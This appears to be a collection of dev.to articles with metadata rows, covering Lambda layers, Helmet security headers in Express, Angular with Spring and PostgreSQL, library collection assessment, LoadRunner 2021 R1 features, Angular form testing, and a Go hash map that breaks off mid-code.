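    Type: AWS::Serverless::Function
    Properties:
      # ...existing properties stay as they are...
      Layers:
        - !Ref Momentlayer
```

After updating the template, run `sam deploy` again, and remove moment from the function's own package (`npm uninstall moment` inside the src folder) so it is no longer bundled with the function itself.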
Note that the layer has to be created under the nodejs/node_modules path according to the [AWS documentation](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) unless you'd like to specify the runtime PATH yourself. In our example, we have the node_modules under the nodejs folder, and the "ContentUri" property in the template file points to that folder.
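In other words, the content that ends up zipped into the layer should look roughly like this (the layer folder name itself is our own choice; only the nodejs/node_modules part is mandated):

```
layer/
└── nodejs/
    ├── package.json
    └── node_modules/
        └── moment/
```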
Now navigate to the lambda in your AWS Console, test it by passing a JSON object that has a "date" property, and verify the date is printed in the DD MMM YYYY format.
## Should we use Layers?
If we look at our lambda size, the **Package size shows 277.0 bytes** instead of the 1.1 MB it was before moving moment to a layer.
Assume we need to reuse that code (in our example, it's momentjs) in another lambda. We could now simply reference the layer, a great way to share code across lambda functions.
The usage of layers comes with a couple of disadvantages though:
- Testing the lambda becomes a bit more complex as the content of the layer is needed during the execution of the unit and integration tests.
- Usage of layers is harder with statically compiled languages (e.g. Java, C#), as they require the dependencies alongside the application code at compilation time.
It is worth weighing the benefits of layers against the complexity they introduce to your process. Usually, a good use case would be sharing a large code base across multiple functions (our example above is not a good use case for Layers, just a simple way to demonstrate their usage).
I hope you liked the post, and I look forward to your feedback.
| ahaydar | |
693,254 | Why do you need Helmet in NodeJs ? | Helmet helps you secure your Express apps by setting various HTTP headers. It's not a silver bullet,... | 0 | 2021-05-10T05:27:49 | https://dev.to/sid__/why-do-you-need-helmet-in-nodejs-h1b | node, webdev, codenewbie, javascript | > Helmet helps you secure your Express apps by setting various HTTP headers. It's not a silver bullet, but it can help!
These are the lines written on top of the npm's helmet page.
Most of you might have come across this code `app.use(helmet())` in your codebase/boilerplates. Let's dive deep into helmet today.
In simple words, Helmet adds/secures HTTP headers returned by your express app.
Many newbie devs tend to ignore this (securing HTTP headers).
`helmet()` is a wrapper around 15 middlewares, 11 of which are used by default with preset settings.
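Conceptually, each of those middlewares just sets (or removes) a response header. A hand-rolled sketch in plain Node, with no Express or helmet involved, makes the idea concrete; the values here are approximations of the defaults described below, not helmet's exact output:

```
// Rough illustration of what helmet() does: decorate every response
// with a set of security headers. Values approximate helmet defaults.
function securityHeaders() {
  return {
    'X-DNS-Prefetch-Control': 'off',
    'X-Frame-Options': 'SAMEORIGIN',
    'Strict-Transport-Security': 'max-age=15552000; includeSubDomains', // 180 days
    'X-Download-Options': 'noopen',
    'X-Content-Type-Options': 'nosniff',
    'Referrer-Policy': 'no-referrer',
  };
}

// An Express-style middleware would apply them like this:
function helmetLike(req, res, next) {
  Object.entries(securityHeaders()).forEach(([name, value]) =>
    res.setHeader(name, value)
  );
  next();
}
```

The real helmet() does the same kind of work, with far more care and configurability, which is why you should use it rather than hand-rolling headers.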
Let's see those 11 headers in detail:
- ##`Content-Security-Policy`
Used for mitigating XSS Attacks. Helps control what domain/subdomain, which protocol, what kind of media should talk to the server.
`helmet.contentSecurityPolicy();`
- ##`X-DNS-Prefetch-Control`
As the name of this header suggests, the browser tries to resolve DNS while (in parallel) loading the page content. DNS resolution for what? - For the links, images, etc referenced on the page which is being loaded. Prefetching occurs in the background. Helps reduce latency. By default, helmet sets this as `off`.
`helmet.dnsPrefetchControl(options)`
- ##`Expect-CT`
CT in this header stands for **Certificate Transparency**. It helps catch misissued certificates for the site.
`helmet.expectCt()`
- ##`X-Frame-Options`
A well-known header that prevents clickjacking to a certain extent. Gets overridden by the `frame-ancestors` directive of the Content Security Policy header.
`helmet.frameguard();`
- ##`X-Powered-By`
This header makes very little difference even if turned off. Set to `express` by default in the Express framework.
`helmet.hidePoweredBy()`
- ##`Strict-Transport-Security`
or HSTS in short, tells browsers that the website should only be accessible via HTTPS. No plain HTTP, please! Takes one mandatory param _max-age_ (which is 180 days in helmet) and 2 optional params _includeSubDomains_ (defaults to true) & _preload_ (defaults to false) in options.
`helmet.hsts(options)`
- ##`X-Download-Options`
Specific to Internet Explorer, this header forces potentially unsafe files to be downloaded directly instead of opened, thus preventing script injections, since the file is no longer opened in the security context of the site.
`helmet.ieNoOpen()`
- ##`X-Content-Type-Options`
helmet.noSniff sets the X-Content-Type-Options header to nosniff. Browsers in some cases try to guess MIME types by looking at the bytes of resources shared by the server. Hey Browser! Don't do that. That's MIME sniffing. Let me give you a nosniff in the Content-Type Options.
`helmet.noSniff()`
- ##`X-Permitted-Cross-Domain-Policies`
Ah! That's a little tricky. Check this [article](https://owasp.org/www-project-secure-headers/#x-permitted-cross-domain-policies) for a detailed description.
`helmet.permittedCrossDomainPolicies(options)`
- ##`Referrer-Policy`
The server dictates what referrer information it needs in the `Referer` (oh yeah, that's a misspelling baked into the standard) header via the `Referrer-Policy` header. It defaults to no-referrer when using helmet.
`helmet.referrerPolicy(options)`
- ##`X-XSS-Protection`
Oh, stop! I detected an XSS attack.
If it's 0 - Disables XSS filtering.
If it's 1 - Enables XSS filtering. sanitize and then load if XSS is detected.
If it's 1; mode=block - Enables XSS filtering. Do not sanitize, just stop the rendering altogether.
`helmet.xssFilter()`
So that was all about the 11 default headers Helmet sets. A snippet from Helmet's [NPM Page](https://www.npmjs.com/package/helmet):

| sid__ |
693,494 | Angular 11 + Spring JPA + PostgreSQL example | Angular 11 Http Client – Spring Boot RestApi Server | https://ozenero.com/angular-11-spring-jpa-postgresql-crud Angular 11 + Spring JPA + PostgreSQL examp... | 0 | 2021-05-10T08:20:00 | https://dev.to/loizenai/angular-11-spring-jpa-postgresql-example-angular-11-http-client-spring-boot-restapi-server-4j8f | angular11, springboot, springjpa, restapi | https://ozenero.com/angular-11-spring-jpa-postgresql-crud
Angular 11 + Spring JPA + PostgreSQL example | Angular 11 Http Client – Spring Boot RestApi Server
In this tutorial, <strong>ozenero</strong> shows you an Angular 11 Http Client & Spring Boot Server example that uses <strong>Spring JPA</strong> to interact with <strong>PostgreSQL</strong> and <strong>Angular 11</strong> as a front-end technology to make requests and receive responses.
Related Posts:
- <a href="https://ozenero.com/spring-framework/spring-boot/use-spring-jpa-postgresql-spring-boot">How to use Spring JPA with PostgreSQL | Spring Boot</a>
- <a href="https://ozenero.com/spring-framework/spring-boot/spring-jpa-postgresql-angularjs-example-spring-boot">Spring JPA + PostgreSQL + AngularJS example | Spring Boot</a>
- <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-http-client-fetch-data-springboot-restapi">How to use Angular Http Client to fetch Data from SpringBoot RestAPI – Angular 11</a>
- <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-httpclient-post-put-delete-data-springboot-rest-apis-angular-4">How to use Angular HttpClient to POST, PUT, DELETE data on SpringBoot Rest APIs – Angular 11</a>
Updated:
- <a href="https://ozenero.com/spring-framework/spring-boot/spring-boot-angular-6-example-spring-data-rest-postgresql-example">Spring Boot + Angular 6 example | Spring Data JPA + REST + PostgreSQL CRUD example</a>
<!--more-->
<h2>I. Technologies</h2>
– Java 1.8
– Maven 3.3.9
– Spring Tool Suite – Version 3.8.4.RELEASE
– Spring Boot: RELEASE
– Angular 11
<h2>II. Overview</h2>
<img src="https://ozenero.com/wp-content/uploads/2017/05/angular-http-service-architecture-1.png" alt="angular-http-service-architecture" width="570" height="542" class="alignnone size-full wp-image-5475" />
<h3>1. Spring Boot Server</h3>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-spring-boot-architecture.png" alt="angular-4-spring-jpa-postgresql-spring-boot-architecture" width="700" height="330" class="alignnone size-full wp-image-7626" />
For more details about Spring JPA - PostgreSQL, please visit:
<a href="https://ozenero.com/spring-framework/spring-boot/use-spring-jpa-postgresql-spring-boot">How to use Spring JPA with PostgreSQL | Spring Boot</a>
<h3>2. Angular 11 Client</h3>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-angular-architecture.png" alt="angular-4-spring-jpa-postgresql-angular-architecture" width="698" height="342" class="alignnone size-full wp-image-7628" />
For more details:
- About Angular 11 Routing:
<a href="https://ozenero.com/spring-framework/spring-boot/work-angular-routing-spring-boot-angular-4">How to work with Angular Routing – Spring Boot + Angular 11</a>
- About Angular Http Client to GET/POST/DELETE:
+ <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-http-client-fetch-data-springboot-restapi">How to use Angular Http Client to fetch Data from SpringBoot RestAPI – Angular 11</a>
+ <a href="https://ozenero.com/spring-framework/spring-boot/use-angular-httpclient-post-put-delete-data-springboot-rest-apis-angular-4">How to use Angular HttpClient to POST, PUT, DELETE data on SpringBoot Rest APIs – Angular 11</a>
<h2>III. Practice</h2>
<h3>1. Project Structure</h3>
<h4>1.1 Spring Boot Server</h4>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-spring-boot-structure.png" alt="angular-4-spring-jpa-postgresql-spring-boot-structure" width="347" height="362" class="alignnone size-full wp-image-7630" />
- Class <strong>Customer</strong> corresponds to entity and table <strong>customer</strong>, it should be implemented <strong>Serializable</strong>.
- <strong>CustomerRepository</strong> is an interface extends <strong>CrudRepository</strong>, will be autowired in <strong>CustomerController</strong> for implementing repository methods and custom finder methods.
- <strong>CustomerController</strong> is a REST Controller which has request mapping methods for RESTful requests such as: <code>getAll</code>, <code>postCustomer</code>, <code>delete</code>, <code>findByLastName</code>.
- Configuration for Spring Datasource and Spring JPA properties in <strong>application.properties</strong>
- <strong>Dependencies</strong> for <strong>Spring Boot</strong> and <strong>PostgreSQL</strong> in <strong>pom.xml</strong>
<h4>1.2 Angular 11 Client</h4>
<img src="https://ozenero.com/wp-content/uploads/2017/08/angular-4-spring-jpa-postgresql-angular-structure.png" alt="angular-4-spring-jpa-postgresql-angular-structure" width="418" height="372" class="alignnone size-full wp-image-7631" />
| loizenai |
693,759 | Collection Analysis and Evaluation | Collection analysis is the process of determining what the exact nature of a collection is. It... | 11,710 | 2021-05-12T08:34:08 | https://dev.to/diyawi/collection-analysis-and-evaluation-2lfl | lis55, learningdiary | Collection analysis is the process of determining what the exact nature of a collection is. It is essential for determining the gaps and weaknesses of the collection, as well as determining what items need to be deselected. It is important as it aids the library and the library's parent organization in making crucial decisions.
Collection assessment is one of the main activities of collection analysis. Assessment involves the library in question analyzing its own collection, usually with the goal of determining whether the collection is fulfilling the mission and vision set by the library and its parent organization. There are two main types of collection assessment, collection-based and user-based - both of which have quantitative and qualitative methods.
Collection-based collection assessment involves assessing the collection based on the items contained in the collection. Quantitative collection-based assessment methods include collection size and growth, adherence to collection standards, content overlap studies, ratio measures, and materials budget size and growth. Qualitative collection-based assessment methods include list checking, collection profiling, seeking expert opinions, verification studies, citation analysis, direct collection checking, collection mapping and brief tests of collection strength.
User-based collection assessment - also called use-based collection assessment - focuses on assessing the collection based on how often or well certain items are used. Quantitative methods include interlibrary loan statistics and transactions, circulation and in-house use statistics, document delivery statistics and for e-resources the number of "hits", downloads and their cost per use. Qualitative methods include user-opinion surveys, focus group, user observation and usability testing.
In general, determining how successful a library's collection is can be very difficult. In theory it is determined by how well the library has chosen its collection to suit its users, but in practice it is difficult to measure how effective a library is at helping its clients. Every library has different clients, all of whom have individual needs. Given that, it is difficult to compare libraries against each other or create a standard for their collections. It is also difficult to ask the library's users to explain how useful the library has been to them, as this too differs from person to person and library to library. To try to accommodate for this difficulty, libraries usually assess their collections using several of the methods discussed.
To demonstrate this, I will use my former high school library as an example. My former high school was Philippine Science High School Main Campus (PSHS-MC). There are four distinct collections housed in the PSHS-MC library. The first, as with any school library, contains materials that support the school curriculum. These were kept away from the main collection and distributed to the students at the start of each year, with the expectation that the students would return them at the end of the year. This collection is chosen based on the curriculum, and will most likely be assessed based on the expert opinions of the different subject teachers for their respective fields. The materials should also adhere to international standards for textbooks suitable for a high school curriculum. Another issue is the fact that these items are given to different students each academic year to take home, and are subject to wear and tear. As such the collection should also be checked directly with the goal of finding damaged items.
The second largest collection of the library housed the research works of previous students. As PSHS is a science high school, all students are expected to perform a Science or Technology based research project before graduating, one of the requirements of that project being writing a research paper and having it printed, bound and submitted to the library to be added to the collection. Since this collection contains the legacy of the alumni it should be assessed with the goal of withdrawal in mind rather than deselection. Since this collection is unique it cannot be assessed by any general standard. Instead it should be assessed using in-house use statistics and using citation analysis with the goal of seeing how the present day students utilize the work of their predecessors.
The two smaller collections are kept in service to PSHS's goal of helping the students' holistic development. These are the fiction collection and the Filipiniana collection. These materials should be assessed via list checking, to see if the collections are keeping up with recommended bestsellers, and in-house and circulation statistics to see if the students are actually using the collection items. The former may be difficult for the Filipiniana collection, as there are likely fewer notable lists of Filipiniana items. | diyawi |
693,872 | Which lint ruleset is best for Vue ? | Is it Eslint With vue/recommanded ? Airbnb ? Prettier ? Something else ? What do you guys think ?... | 0 | 2021-05-10T15:33:52 | https://dev.to/mikaleb/which-lint-ruleset-is-best-for-vue-1mne | question, vue, lint | Is it Eslint With vue/recommanded ?
Airbnb ?
Prettier ?
Something else ? What do you guys think ?
| mikaleb |
693,904 | What's new in LoadRunner Professional 2021 R1? | As you know, I publish what's new in Micro Focus LoadRunner from past many years. This time as well,... | 0 | 2021-05-10T16:46:06 | https://qainsights.com/whats-new-in-loadrunner-professional-2021-r1 | performance, testing, webperf, tools | <!-- wp:paragraph -->
<p>As you know, I publish <a href="https://qainsights.com/whats-new-in-microfocus-loadrunner-professional-2021/" target="_blank" rel="noreferrer noopener">what's new in Micro Focus LoadRunner</a> from past many years. This time as well, it is business as usual for LoadRunner What's New section. Last week, Micro Focus announced its first minor release for their performance testing solutions. In this blog, we are going to see what's new in LoadRunner Professional 2021 R1.</p>
<!-- /wp:paragraph -->
<!-- wp:generateblocks/headline {"uniqueId":"9a39f731"} -->
<h2 class="gb-headline gb-headline-9a39f731 gb-headline-text">Say Hello to LoadRunner Professional 2021 R1</h2>
<!-- /wp:generateblocks/headline -->
<!-- wp:paragraph -->
<p>Micro Focus follows the <a href="https://calver.org" target="_blank" rel="noreferrer noopener nofollow">CalVer</a> nomenclature for its products. Last year the releases were named with Service Pack numbers, but this year Micro Focus started using release numbers. This minor release is called LoadRunner Professional 2021 R1.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8331,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-5.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-5.png" alt="What's new in LoadRunner Professional 2021 R1?" class="wp-image-8331"/></a><figcaption>What's new in LoadRunner Professional 2021 R1?</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:generateblocks/headline {"uniqueId":"cb1a48b7"} -->
<h2 class="gb-headline gb-headline-cb1a48b7 gb-headline-text">What's new in LoadRunner Professional 2021 R1?</h2>
<!-- /wp:generateblocks/headline -->
<!-- wp:generateblocks/headline {"uniqueId":"127affb7","element":"h3"} -->
<h3 class="gb-headline gb-headline-127affb7 gb-headline-text">DevWeb Protocol</h3>
<!-- /wp:generateblocks/headline -->
<!-- wp:paragraph -->
<p>Full code completion is now available in this patch for DevWeb. Auto completion expedites the process of scripting and debugging.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8326,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image.png" alt="Auto Complete in DevWeb" class="wp-image-8326"/></a><figcaption>Auto Complete in DevWeb</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>Now you can generate a CA certificate to capture HTTPS traffic. You can use DevWebUtils.exe to generate the required certificate.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"id":8327,"sizeSlug":"large","linkDestination":"media"} -->
<figure class="wp-block-image size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-1.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-1-1024x138.png" alt="DevWeb CA Certificate Generation" class="wp-image-8327"/></a><figcaption>DevWeb CA Certificate Generation</figcaption></figure>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>In <strong>General Settings</strong> under <strong>Recording Options</strong>, it is now possible to <strong>generate cookies</strong> and <strong>asynchronous WebRequest</strong> steps. You can also configure the <strong>Charset</strong>, which defaults to utf-8.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8328,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-2.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-2.png" alt="DevWeb Settings" class="wp-image-8328"/></a><figcaption>DevWeb Settings</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>LoadRunner Developer is now supported on macOS 11 (Big Sur). DevWeb now supports server-streaming gRPC requests.</p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":3} -->
<h3 id="h-web-http-htmlprotocol">Web HTTP/HTMLProtocol</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>A small change in the Find and Replace user interface.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8329,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-3.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-3.png" alt="Quick Find" class="wp-image-8329"/></a><figcaption>Quick Find</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>For HTTP Live Streaming (HLS), it is now possible to configure the adaptive mode to tell LoadRunner to download HLS video segments only when they are played.</p>
<!-- /wp:paragraph -->
<!-- wp:code -->
<pre class="wp-block-code"><code>web_stream_open();
...
...
web_stream_close();</code></pre>
<!-- /wp:code -->
<!-- wp:heading {"level":3} -->
<h3 id="h-truclient-protocol">TruClient Protocol</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>TruClient and the Chromium browser have been updated to versions 83 and 88, respectively. Capturing full replay snapshots is now available. Also, this release supports Windows 10 20H2.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"align":"center","id":8330,"sizeSlug":"large","linkDestination":"media"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><a href="https://qainsights.com/wp-content/uploads/2021/05/image-4.png"><img src="https://qainsights.com/wp-content/uploads/2021/05/image-4.png" alt="TruClient full page snapshot settings" class="wp-image-8330"/></a><figcaption>TruClient full page snapshot settings</figcaption></figure></div>
<!-- /wp:image -->
<!-- wp:generateblocks/headline {"uniqueId":"3f1d28f6","element":"h3"} -->
<h3 class="gb-headline gb-headline-3f1d28f6 gb-headline-text">Java Protocols</h3>
<!-- /wp:generateblocks/headline -->
<!-- wp:paragraph -->
<p>Java scripts can be run on Linux LGs for Java over HTTP, Java Record Replay, and Java Vuser. </p>
<!-- /wp:paragraph -->
<!-- wp:heading {"level":3} -->
<h3 id="h-citrix-and-oracle-2-tier-protocols">Citrix and Oracle 2-tier Protocols</h3>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>The Citrix protocol now supports Tesseract 4.1.1, and the Oracle protocol supports Oracle Database 19c.</p>
<!-- /wp:paragraph -->
<!-- wp:generateblocks/headline {"uniqueId":"21697c77","element":"h3"} -->
<h3 class="gb-headline gb-headline-21697c77 gb-headline-text">Others</h3>
<!-- /wp:generateblocks/headline -->
<!-- wp:list -->
<ul><li>Exceptional integration of VuGen with LoadRunner Enterprise and LoadRunner Cloud</li><li>Silk Performer integration</li><li>JMeter 5.4 support</li><li>Pacing runtime support for JMeter and Gatling scripts</li><li>Linux LG support for Selenium scripts</li><li>Visual Studio 2019 IDE support</li><li>You need to have a JRE installed; Micro Focus stopped shipping 32-bit OpenJDK in the installation package</li><li>Round-robin allocation of Vusers across LGs</li><li>Runtime collation is now the default; this saves time</li><li>Transactions will be listed in the order they executed</li></ul>
<!-- /wp:list -->
<!-- wp:paragraph -->
<p>Have you upgraded to LoadRunner Professional 2021 R1 yet? Please let me know in the comments.</p>
<!-- /wp:paragraph --> | qainsights |
694,082 | Angular simple form with async testing | Topic The developer should test the code. In this example, I will create a simple form wit... | 0 | 2021-05-10T18:27:48 | https://dev.to/tomwebwalker/angular-simple-form-with-async-testing-227m | angular, rxjs, testing, typescript | ## Topic
The developer should test the code. In this example, I will create a simple form with an HTTP request after submission, and test it.
## Project
I used Angular CLI to create the project (default CLI answers):
```
ng new notification-example
```
I used Angular Material to provide proper styling by typing (default answers):
```
ng add @angular/material
```
## Main module
To be able to use the required Material modules, I added them to the imports in `AppModule`:
```typescript
imports: [
BrowserModule,
BrowserAnimationsModule,
ReactiveFormsModule,
HttpClientModule,
MatInputModule,
MatFormFieldModule,
MatButtonModule,
MatSnackBarModule,
],
```
I also added `HttpClientModule` to be able to make HTTP calls. `ReactiveFormsModule` is for making Reactive forms.
Full Module code:
```typescript
import { NgModule } from '@angular/core';
import { BrowserModule } from '@angular/platform-browser';
import { AppComponent } from './app.component';
import { BrowserAnimationsModule } from '@angular/platform-browser/animations';
import { ReactiveFormsModule } from '@angular/forms';
import { MatInputModule } from '@angular/material/input';
import { MatFormFieldModule } from '@angular/material/form-field';
import { MatButtonModule } from '@angular/material/button';
import { MatSnackBarModule } from '@angular/material/snack-bar';
import { HttpClientModule } from '@angular/common/http';
@NgModule({
declarations: [AppComponent],
imports: [
BrowserModule,
BrowserAnimationsModule,
ReactiveFormsModule,
HttpClientModule,
MatInputModule,
MatFormFieldModule,
MatButtonModule,
MatSnackBarModule,
],
providers: [],
bootstrap: [AppComponent],
})
export class AppModule {}
```
## Component
In `AppComponent`, I defined a simple form with one field, which I set as required.
```typescript
form = this.formBuilder.group({
text: [null, Validators.required],
});
```
In the constructor, I used two injected classes:
* `FormBuilder` for building the reactive form
* `ApiService` for sending data via an HTTP request (the service is described below).
On form submission, I check whether the form is valid; if it is, I pass the field value to the service.
Full component code:
```typescript
import { Component } from '@angular/core';
import { FormBuilder, Validators } from '@angular/forms';
import { ApiService } from './api.service';
@Component({
selector: 'app-root',
templateUrl: './app.component.html',
styleUrls: ['./app.component.scss'],
})
export class AppComponent {
form = this.formBuilder.group({
text: [null, Validators.required],
});
constructor(
private readonly formBuilder: FormBuilder,
private readonly apiService: ApiService
) {}
onSubmit(): void {
if (this.form.invalid) {
return;
}
this.apiService.create(this.form.get('text').value);
}
}
```
The HTML part is really simple. It has a form with one field and a submit button.
Full HTML code:
```HTML
<form [formGroup]="form" (submit)="onSubmit()">
<mat-form-field appearance="fill">
<mat-label>Text</mat-label>
<input matInput formControlName="text">
</mat-form-field>
<button mat-raised-button color="primary" [disabled]="form.invalid">Send</button>
</form>
```
To place the form in the center of the window, I added some flexbox styling:
```css
:host {
display: flex;
flex-direction: column;
align-items: center;
justify-content: center;
height: 100%;
}
form {
display: flex;
flex-direction: column;
width: 400px;
}
```
`:host` applies styling to the component root element, so Angular will apply the styling to the `<app-root>` element.
## Service
At the beginning of the service, I defined two variables:
* `url` - URL address where service will send data
* `subject` - an RxJS [class](https://rxjs.dev/api/index/class/Subject) used to feed data into the HTTP call. We can push data into it with the `next` method.
Constructor has two injected classes:
* `HttpClient` to be able to make HTTP calls,
* `MatSnackBar` for displaying snack bar from Angular Material.
Subject is used to pass data:
```typescript
this.subject
.pipe(
debounceTime(500),
switchMap((text) => this.http.post(`${this.url}posts`, { text }))
)
.subscribe(
() => this.snackBar.open('Post saved!', null, { duration: 3000 }),
() =>
this.snackBar.open('Something went wrong.', null, { duration: 3000 })
);
```
I use the subject as an observable by calling the `pipe` method to work on the stream:
* `debounceTime` RxJS [operator](https://rxjs.dev/api/operators/debounceTime) delays emission by the given time and discards values that are superseded by a newer one within that period.
* `switchMap` RxJS [operator](https://rxjs.dev/api/operators/switchMap) maps each value from the outer observable to an inner observable (here, the HTTP call) and cancels the previous inner observable when a new value arrives. An Angular service is a singleton by default, so we don't have to unsubscribe from the subject created inside the constructor.
If no error occurs during the emission, a snack bar opens with a `Post saved!` message. If an error occurs, `Something went wrong.` is displayed instead.
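To build intuition for `debounceTime`, here is a tiny framework-free sketch of debouncing in plain JavaScript (not RxJS; the 50 ms delay and the `save` name are just for illustration):

```javascript
// Toy debounce: every new call cancels the pending one, so only the
// last value emitted within the quiet period is actually processed.
function debounce(fn, ms) {
  let timer;
  return (value) => {
    clearTimeout(timer);
    timer = setTimeout(() => fn(value), ms);
  };
}

const sent = [];
const save = debounce((text) => sent.push(text), 50);

save('test');
save('test1'); // cancels the pending 'test'

setTimeout(() => console.log(sent), 100); // logs [ 'test1' ]
```

This mirrors the service tests further down, where two quick `create` calls end up as a single HTTP request carrying only the last value.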
To pass data to the subject, I use the `next` method:
```typescript
create(text: string): void {
this.subject.next(text);
}
```
Full service code:
```typescript
import { HttpClient } from '@angular/common/http';
import { Injectable } from '@angular/core';
import { MatSnackBar } from '@angular/material/snack-bar';
import { Subject } from 'rxjs';
import { debounceTime, switchMap } from 'rxjs/operators';
@Injectable({
providedIn: 'root',
})
export class ApiService {
private readonly url = 'https://jsonplaceholder.typicode.com/';
private readonly subject = new Subject<string>();
constructor(
private readonly http: HttpClient,
private readonly snackBar: MatSnackBar
) {
this.subject
.pipe(
debounceTime(500),
switchMap((text) => this.http.post(`${this.url}posts`, { text }))
)
.subscribe(
() => this.snackBar.open('Post saved!', null, { duration: 3000 }),
() =>
this.snackBar.open('Something went wrong.', null, { duration: 3000 })
);
}
create(text: string): void {
this.subject.next(text);
}
}
```
## Service tests
To check code coverage of our project, I typed in the command line:
```
ng test --code-coverage
```
It uses a karma reporter to generate test coverage, which I can check in the `coverage` directory. My service test is missing some checks, so I will add them.

I generated the service with:
```
ng g service api
```
so I have a service file and `*.spec.ts` file, which contains tests.
The `describe` block wraps the tests into a group. The `beforeEach` method is triggered before each test. In the testing module configured there, the `imports` are:
```typescript
describe('Service: Api', () => {
let service: ApiService;
let http: HttpClient;
let snackBar: MatSnackBar;
beforeEach(() => {
TestBed.configureTestingModule({
providers: [ApiService],
imports: [HttpClientTestingModule, MatSnackBarModule, NoopAnimationsModule],
});
service = TestBed.inject(ApiService);
http = TestBed.inject(HttpClient);
snackBar = TestBed.inject(MatSnackBar);
});
```
* `HttpClientTestingModule` - for faking HTTP requests (I don't want to make real calls)
* `MatSnackBarModule` - the component needs it to construct
* `NoopAnimationsModule` - the component needs it to construct; fakes animations
Next, I grab the instances required in the tests:
* `service` - my service instance, which lets me call the service methods
* `http` - the HTTP service, for mocking responses
* `snackBar` - for spying on method calls
### Test: should send http call
```typescript
it('should send http call', fakeAsync(() => {
const spy = spyOn(http, 'post').and.callThrough();
service.create('test');
service.create('test1');
tick(500);
expect(spy).toHaveBeenCalledOnceWith('https://jsonplaceholder.typicode.com/posts', { text: 'test1' });
}));
```
`it` wraps a single unit test. `fakeAsync` lets me simulate the passage of time inside the test.
```typescript
const spy = spyOn(http, 'post').and.callThrough();
```
I want to check whether the `post` method gets called. I spy on the `http` instance and use `.and.callThrough()` so the original code still executes, just as it would inside the service.
```typescript
service.create('test');
service.create('test1');
tick(500);
```
I pass values to the `create` method just like the component does. `tick` simulates the passage of the given number of milliseconds (the reason for wrapping the test with `fakeAsync`).
```typescript
expect(spy).toHaveBeenCalledOnceWith('https://jsonplaceholder.typicode.com/posts', { text: 'test1' });
}));
```
At the end, I check that my `spy` (the `post` method of the `HttpClient` instance) was called exactly once with the expected URL and body. Because of `debounceTime(500)`, only the last of the two `create` calls reaches the HTTP layer.
### Test: should call open on snack bar positive
```typescript
it('should call open on snack bar positive', fakeAsync(() => {
spyOn(http, 'post').and.returnValue(of(true));
const openSpy = spyOn(snackBar, 'open');
service.create('test');
tick(500);
expect(openSpy).toHaveBeenCalledOnceWith('Post saved!', null, { duration: 3000 });
}));
```
The main difference from the first test is:
```typescript
spyOn(http, 'post').and.returnValue(of(true));
```
I used `.and.returnValue(of(true))` to fake the HTTP response, returning a new observable created with the `of` operator and the value `true`. The rest of the test is similar to the first one. At the end, I check that the "positive" snack bar was opened.
### Test: should call open on snack bar negative
```typescript
it('should call open on snack bar negative', fakeAsync(() => {
spyOn(http, 'post').and.returnValue(throwError('err'));
const openSpy = spyOn(snackBar, 'open');
service.create('test');
tick(500);
expect(openSpy).toHaveBeenCalledOnceWith('Something went wrong.', null, { duration: 3000 });
}));
```
Like the second test, but here `post` returns an error observable (via `throwError`), so I check that the "negative" snack bar was opened.
Now, after checking the code coverage, my service is 100% covered and all tests pass:

[Link](https://github.com/TomWebwalker/notification-example) to repo.
| tomwebwalker |
697,171 | HashMap in Go | This is a implementation of closed addressing in a typical hashmap we use in go lang. some globals &... | 0 | 2021-05-13T12:11:06 | https://dev.to/satishrajnale/hashmap-in-go-3oid | go | This is an implementation of closed addressing (separate chaining) for a typical hash map in Go.
**some globals & imports**
```go
package main
import "fmt"
const ArraySize = 7
```
### Now let's define our steps
## Structures
> Hashtable structure
```go
type HashTable struct {
	// our hashtable will be an array
	array [ArraySize]*bucket
}
```
> bucket structure (linkedlist)
```go
type bucket struct {
	head *bucketNode
}
```
> bucketNode structure
```go
type bucketNode struct {
	key  string
	next *bucketNode
}
```
## Hash function
```go
func hash(key string) int {
	sum := 0
	for _, v := range key {
		sum += int(v)
	}
	return sum % ArraySize
}
```
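Because the hash just sums rune values modulo the table size, anagrams always collide into the same bucket; that collision is exactly what the linked-list buckets below handle. A quick standalone check (the keys `"ab"` and `"ba"` are arbitrary examples):

```go
package main

import "fmt"

const ArraySize = 7

// same hash as above: sum of rune values modulo the table size
func hash(key string) int {
	sum := 0
	for _, v := range key {
		sum += int(v)
	}
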